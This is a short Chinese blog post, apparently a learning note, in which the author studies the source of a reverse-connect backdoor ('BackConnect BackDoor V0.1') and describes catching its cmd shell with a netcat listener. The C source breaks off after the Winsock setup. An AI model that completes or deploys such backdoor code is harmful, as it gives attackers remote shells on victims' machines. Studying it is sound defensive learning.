反向连接后门的使用

这是一个反向连接的源程序 通过对这个程序的研究我可以知道一个cmd shell是怎么建立并实现的

这是一个单管道的程序 为此我还专门看了一下书中所讲的零管道和双管道

用瑞士军刀进行监听 最后得到一个cmd shell

是不是溢出攻击也是要用到这个哟 嘿嘿 幻想...

 

#include<winsock2.h>
#include<stdio.h>

#pragma comment(lib,"ws2_32.lib")

void main(int argc,char **argv)
{
char *messages = "/r/n======================== BackConnect BackDoor V0.1 ========================/r/n========= Welcome to Http://www.nohack.cn =========/r/n";
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
char buf1[1024];   //作为socket接收数据的缓冲区
memset(buf1,0,1024);   //清空缓冲区
 
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
   {
     printf("WSAStartup error.Error:d/n",WSAGetLastError());
     return;
   }

   addr_in.sin_family=AF_INET;
   addr_i

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值